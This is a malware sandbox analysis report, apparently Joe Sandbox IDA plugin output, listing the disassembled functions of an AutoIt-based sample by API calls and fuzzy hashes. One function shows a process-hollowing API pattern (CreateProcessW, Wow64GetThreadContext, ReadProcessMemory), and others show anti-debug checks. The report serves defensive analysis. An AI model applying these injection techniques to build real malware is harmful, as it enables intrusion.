Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 0948eafe1b256288336519b98f320596f8fdbe49ac2626d65767d8e6779c4ec4
Instruction ID: dca13351d5fbecad1f88c62047ec2f2f6566a6bb6177960a4c82fe4165d10a06
Opcode Fuzzy Hash: 0948eafe1b256288336519b98f320596f8fdbe49ac2626d65767d8e6779c4ec4
Instruction Fuzzy Hash: 8181E3B0801A48CE8784DF29A9656597BE5FB49F06F5081AAD069FB362EBF04484FF10

Function 00EA434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EA4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EA4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EA4432

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 058aa565bf58c2fee335d966f37cd1052d1a9856dc2e541664cf66b1ce3c643a
Instruction ID: 2c8ed5a61556ee5ac6f571e76e28adf9f7a05f778535929ebb120122bc8334f7
Opcode Fuzzy Hash: 058aa565bf58c2fee335d966f37cd1052d1a9856dc2e541664cf66b1ce3c643a
Instruction Fuzzy Hash: 013193B0504701CFD721DF24D88469BBBF8FB9D709F00092EE59AAA291D7F1B948DB52

Function 00EC571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00EC5733

Part of subcall function 00ECA16B: __NMSG_WRITE.LIBCMT ref: 00ECA192
Part of subcall function 00ECA16B: __NMSG_WRITE.LIBCMT ref: 00ECA19C

__NMSG_WRITE.LIBCMT ref: 00EC573A

Part of subcall function 00ECA1C8: GetModuleFileNameW.KERNEL32(00000000,00F633BA,00000104,?,00000001,00000000), ref: 00ECA25A
Part of subcall function 00ECA1C8: ___crtMessageBoxW.LIBCMT ref: 00ECA308

Part of subcall function 00EC309F: ___crtCorExitProcess.LIBCMT ref: 00EC30A5
Part of subcall function 00EC309F: ExitProcess.KERNEL32 ref: 00EC30AE

Part of subcall function 00EC8B28: __getptd_noexit.LIBCMT ref: 00EC8B28

RtlAllocateHeap.NTDLL(016A0000,00000000,00000001,00000000,?,?,?,00EC0DD3,?), ref: 00EC575F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: a9da3ca9d80344d5b46752626d941bbf6f93ae63a612712907699b65e9ff0b7f
Instruction ID: 7785451cfa0385c8af07e3f514382972465c233c9a82f9bfe09bea064de3d053
Opcode Fuzzy Hash: a9da3ca9d80344d5b46752626d941bbf6f93ae63a612712907699b65e9ff0b7f
Instruction Fuzzy Hash: F701DE36200B15DAD6142778AF82F6E73888B82769F50253EF415BA182DFB2ACC35661

Function 00F098A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F09548,?,?,?,?,?,00000004), ref: 00F098BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F09548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F098D1
CloseHandle.KERNEL32(00000000,?,00F09548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F098D8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a697bea9d11b21f297bbbab0a5c1b800fdbad1064cb33a5af30996b35d2ef9eb
Instruction ID: 55e975ed23d74eb559125952e54e8a31b12f6c7c72846b7c6f0f97be8508873c
Opcode Fuzzy Hash: a697bea9d11b21f297bbbab0a5c1b800fdbad1064cb33a5af30996b35d2ef9eb
Instruction Fuzzy Hash: 9EE08632141218B7D7311B94EC0AFCA7B69EB06770F108230FB14690E087B11926A798

Function 00F08D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F08D1B

Part of subcall function 00EC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EC9A24), ref: 00EC2D69
Part of subcall function 00EC2D55: GetLastError.KERNEL32(00000000,?,00EC9A24), ref: 00EC2D7B

_free.LIBCMT ref: 00F08D2C
_free.LIBCMT ref: 00F08D3E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 655aa08b7bb1b8a9a3af9403a6d149503cb917e1d2bd35dfaa60133f0ed537ab
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: BAE012E1A1260147CB24A5B8AA40F9367DC4F683A27141A2DB54EE71C6CE64F843A128

Function 00EAA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00EDFC01

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: bf1968468129425d69b1d846a56371323e64c56237fa186fe058ae73e5a6c1b7
Instruction ID: 8b54ab55cc326e9aecdc7af2d0d0e448e893294e378a37219bd0ab60acc5715d
Opcode Fuzzy Hash: bf1968468129425d69b1d846a56371323e64c56237fa186fe058ae73e5a6c1b7
Instruction Fuzzy Hash: C9225970508341DFCB24DF14C490A6AB7E1FF8A314F19996DE89AAB362D731EC45DB82

Function 00EA4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EA4CBA

Strings

EA06, xrefs: 00EDD8CC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 6f1728135020d26d5e8f7f383dba2ae87920ddcbff216bfd7dd29e63b548c7ce
Instruction ID: 79a674a931a9b6527bfb515de26de959a72fae9c93226d6d8f6440ac845411ff
Opcode Fuzzy Hash: 6f1728135020d26d5e8f7f383dba2ae87920ddcbff216bfd7dd29e63b548c7ce
Instruction Fuzzy Hash: AA415CB1A041585BDF229B5488517FE7FA29BCF304F287465EC86BE2C2D6A07D4493A1

Function 00EA47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00EA4834

Part of subcall function 00EC336C: __lock.LIBCMT ref: 00EC3372
Part of subcall function 00EC336C: DecodePointer.KERNEL32(00000001,?,00EA4849,00EF7C74), ref: 00EC337E
Part of subcall function 00EC336C: EncodePointer.KERNEL32(?,?,00EA4849,00EF7C74), ref: 00EC3389

Part of subcall function 00EA48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EA4915
Part of subcall function 00EA48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EA492A

Part of subcall function 00EA3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EA3B68
Part of subcall function 00EA3B3A: IsDebuggerPresent.KERNEL32 ref: 00EA3B7A
Part of subcall function 00EA3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F652F8,00F652E0,?,?), ref: 00EA3BEB
Part of subcall function 00EA3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00EA3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EA4874

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 454ed5ca7c282da41e0716e465e73eeca5b996310e33982cbc23a02a27facbdb
Instruction ID: 67472a5386e5f1aa6ec5805fb6657ed71680cf5d064466a647258eb49f6247ce
Opcode Fuzzy Hash: 454ed5ca7c282da41e0716e465e73eeca5b996310e33982cbc23a02a27facbdb
Instruction Fuzzy Hash: E01190719043499BC700DF28E90590ABFE8EF8AB54F10451EF050A72B2DBB59549DB91

Function 00EA5C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00EA5821,?,?,?,?), ref: 00EA5CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00EA5821,?,?,?,?), ref: 00EDDD73

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2c80407880e1a64a51b7e2e289d07f6e273a31cd2efa1d2f509de392fe052f28
Instruction ID: c67d5f02fd4862ffa5705d29424459a9f319c299811265463a7e6ac88cf2d18c
Opcode Fuzzy Hash: 2c80407880e1a64a51b7e2e289d07f6e273a31cd2efa1d2f509de392fe052f28
Instruction Fuzzy Hash: 08018471244718BEF7240E24CD8AF667ADCEB0677CF208315BAD5BA1E0C6B41C498B50

Function 00EC0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EC571C: __FF_MSGBANNER.LIBCMT ref: 00EC5733
Part of subcall function 00EC571C: __NMSG_WRITE.LIBCMT ref: 00EC573A
Part of subcall function 00EC571C: RtlAllocateHeap.NTDLL(016A0000,00000000,00000001,00000000,?,?,?,00EC0DD3,?), ref: 00EC575F

std::exception::exception.LIBCMT ref: 00EC0DEC
__CxxThrowException@8.LIBCMT ref: 00EC0E01

Part of subcall function 00EC859B: RaiseException.KERNEL32(?,?,?,00F59E78,00000000,?,?,?,?,00EC0E06,?,00F59E78,?,00000001), ref: 00EC85F0

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: f42d42e3dd0ad28f81e7da51e3962abef79abef226f49576edd8453145c497f7
Instruction ID: 05f460010a60d3f4f991382d1cc544a257a51a89aa988c1c279b82f2dfdb8910
Opcode Fuzzy Hash: f42d42e3dd0ad28f81e7da51e3962abef79abef226f49576edd8453145c497f7
Instruction Fuzzy Hash: A6F08631500319E6CB14AA94EF01FDE7BEC9F01315F10541EF914B6541DFB29A92D5D1

Function 00EC55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EC562C
__lock_file.LIBCMT ref: 00EC564D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 430a2c8df4e69aec51832908e66e3ca3fd4f720e70dfc7e36f0f4dc6d7baa7a2
Instruction ID: d725e005523ce81477ddd7f7f518ec230b5e3966a396ec7fcfb0c368c1b5f29f
Opcode Fuzzy Hash: 430a2c8df4e69aec51832908e66e3ca3fd4f720e70dfc7e36f0f4dc6d7baa7a2
Instruction Fuzzy Hash: 35018872800604ABCF11AF649F02EAE7BA1AF91361F54511DF82436191DB339993DF91

Function 00EC53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EC8B28: __getptd_noexit.LIBCMT ref: 00EC8B28

__lock_file.LIBCMT ref: 00EC53EB

Part of subcall function 00EC6C11: __lock.LIBCMT ref: 00EC6C34

__fclose_nolock.LIBCMT ref: 00EC53F6

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: cddbca6888508b308e7f90d1dee1e1d3fd357283529f6a0356c002d1b42ff670
Instruction ID: 3237e2c0901cb888d54c5a7edd4bf58eced10c6426fde4c9d48a3d8b48d76259
Opcode Fuzzy Hash: cddbca6888508b308e7f90d1dee1e1d3fd357283529f6a0356c002d1b42ff670
Instruction Fuzzy Hash: 7CF09632910A449AD7116B699F01FEE6AE06F42375F20A20CA424BB1C1CBFD99835B52

Function 016F339D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016F3B5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016F3BF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016F3C13

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 9018b25e34d7c536c66bb442efac3a0bbcce61b99becc8c61d3d5bb501ec7625
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: 7B12BD24E24658C6EB24DF64D8507DEB232FF68300F1090ED910DEB7A5E77A4E81CB5A

Function 00EB1FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc63c47797d12b9833da4c484d3e0aa79f05c47241e56f115c30c07e908ad3a
Instruction ID: c52db14d283a28134eda899b4a93c0e2e1a90ff74cd5f315f9d42d1d405f24b5
Opcode Fuzzy Hash: 5bc63c47797d12b9833da4c484d3e0aa79f05c47241e56f115c30c07e908ad3a
Instruction Fuzzy Hash: DC518C31600604ABCF14EB68C991EAE77E6AF8A314F14656CF906BF392CA31FD05DB51

Function 00EA5AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00EA5B96

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0c9f7a90ab36a25233caf9a68870a8c6eeb6c445a575aa2c95554ac675f88551
Instruction ID: 499ee22218134ad6d4e492e6d6ecc15a9e7c33e1d84c7db48e78f0ea35af83cc
Opcode Fuzzy Hash: 0c9f7a90ab36a25233caf9a68870a8c6eeb6c445a575aa2c95554ac675f88551
Instruction Fuzzy Hash: 11316132A00A09AFCB18DF6CC484AADF7B5FF49315F159629E815AB714D770BD90CBA0

Function 00EC0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00EC0CB7

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 09deea9be714b34ed5ca1789585b5c2046b81924ab02c537a0bc00371e97c1fe
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 2231D370A00105DBC718DF58C684E69F7A6FB59314B64A7A9E80AEB351D732EDC2DBC0

Function 00EDFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00EDFCB7

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: bf3d7c4195e6116f501c3684e914270b9f5df99a258eb82deb2bba8ac948f424
Instruction ID: 038d11c8f1ba84e50aab1cdfffaf47f38142d47dd0a234c1c873919a8f92cccd
Opcode Fuzzy Hash: bf3d7c4195e6116f501c3684e914270b9f5df99a258eb82deb2bba8ac948f424
Instruction Fuzzy Hash: 2A410874904341DFDB24DF14C444B1ABBE1BF49318F0998ACE89AAB762C772F845CB52

Function 00EA59B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EA5A01

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0a151cebaae76e051a857acf4c279ba11dd310c7248d9824b023333476f17bcf
Instruction ID: d8194c0104c8bb7a05e49c3440fda0ba9d4f6abef5360e5155885ded33f4e932
Opcode Fuzzy Hash: 0a151cebaae76e051a857acf4c279ba11dd310c7248d9824b023333476f17bcf
Instruction Fuzzy Hash: C9212672518B08EBCB149F51EC416AABBB8FF05311F21946AE485E9110E7B090D1D741

Function 00EA4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00EA4BEF

Part of subcall function 00EC525B: __wfsopen.LIBCMT ref: 00EC5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EA4E0F

Part of subcall function 00EA4B6A: FreeLibrary.KERNEL32(00000000), ref: 00EA4BA4

Part of subcall function 00EA4C70: _memmove.LIBCMT ref: 00EA4CBA

Memory Dump Source

